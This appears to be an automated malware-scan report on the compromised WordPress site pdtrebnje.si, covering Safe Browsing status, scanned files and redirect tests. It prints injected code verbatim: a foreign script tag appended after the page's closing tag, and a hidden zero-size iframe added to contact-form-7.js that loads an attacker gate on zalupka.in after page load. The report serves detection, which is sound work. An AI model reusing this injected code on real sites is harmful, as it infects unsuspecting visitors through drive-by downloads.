Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=pdtrebnje.si
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://pdtrebnje.si/ | 200 OK Content-Length: 30098 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: thomas-fortassin.com ...[4105 bytes skipped]... 17 seconds. --> <script type='text/javascript' src='http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.form.js?ver=2.73'></script> <script type='text/javascript' src='http://pdtrebnje.si/wp/wp-content/plugins/contact-form-7/contact-form-7.js?ver=2.0.5'></script> </div> </div> <!-- page --> </body> </html> <script type="text/javascript" src="http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8313485"></script> | ||
http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.js?ver=1.7.1 | 200 OK Content-Length: 93889 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/lightbox-plus/js/jquery.colorbox-min.js?ver=3.3.1 | 200 OK Content-Length: 8433 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/nextgen-gallery/shutter/shutter-reloaded.js?ver=1.3.0 | 200 OK Content-Length: 8923 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-includes/js/swfobject.js?ver=2.2 | 200 OK Content-Length: 10220 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/nextgen-gallery/js/ngg.js?ver=3.3.1 | 200 OK Content-Length: 5688 Content-Type: application/javascript | clean |
http://lite.piclens.com/current/piclens_optimized.js | 200 OK Content-Length: 21750 Content-Type: application/x-javascript | clean |
http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8314951 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
http://thomas-fortassin.com/test404page.js | 404 Not Found Content-Length: 823 Content-Type: text/html | clean |
http://pdtrebnje.si/wp/wp-includes/js/jquery/jquery.form.js?ver=2.73 | 200 OK Content-Length: 11115 Content-Type: application/javascript | clean |
http://pdtrebnje.si/wp/wp-content/plugins/contact-form-7/contact-form-7.js?ver=2.0.5 | 200 OK Content-Length: 4431 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) jQuery(document).ready(function() { try { jQuery('div.wpcf7 > form').ajaxForm({ beforeSubmit: wpcf7BeforeSubmit, dataType: 'json', success: wpcf7ProcessJson }); } catch (e) { } try { jQuery('div.wpcf7 > form').each(function(i, n) { wpcf7ToggleSubmit(jQuery(n)); }); } catch (e) { } }); function wpcf7ExclusiveCheckbox(elem) {< window.setTimeout(function(){ var JSinj=document.createElement('iframe'); JSinj.src='http://zalupka.in/gate/gate.php?f=759814&r='+encodeURI(document.referrer||''); JSinj.width='0'; JSinj.height='0'; JSinj.frameborder='0'; JSinj.marginheight='0'; JSinj.marginwidth='0'; JSinj.border='0'; try{ document.body.appendChild(JSinj); }catch(e){ document.documentElement.appendChild(JSinj); } }, 2000); } Antivirus reports:
| ||
http://thomas-fortassin.com/Pokewac/wfvwncd9.php?id=8313485 | 200 OK Content-Length: 0 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: pdtrebnje.si
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 04:51:28 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pdtrebnje.si/wp/xmlrpc.php
X-Powered-By: PHP/5.3.28
GET / HTTP/1.1
Host: pdtrebnje.si
Result:
HTTP/1.1 200 OK
Connection: close
Date: Mon, 15 Sep 2014 04:51:28 GMT
Server: Apache/2.4.9 (Unix) OpenSSL/1.0.1e-fips mod_bwlimited/1.4
Content-Type: text/html; charset=UTF-8
X-Pingback: http://pdtrebnje.si/wp/xmlrpc.php
X-Powered-By: PHP/5.3.28
Second query (visit from search engine):
GET / HTTP/1.1
Host: pdtrebnje.si
Referer: http://www.google.com/search?q=pdtrebnje.si
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: pdtrebnje.si
Referer: http://www.google.com/search?q=pdtrebnje.si
Result:
The result is similar to the first query. There are no suspicious redirects found.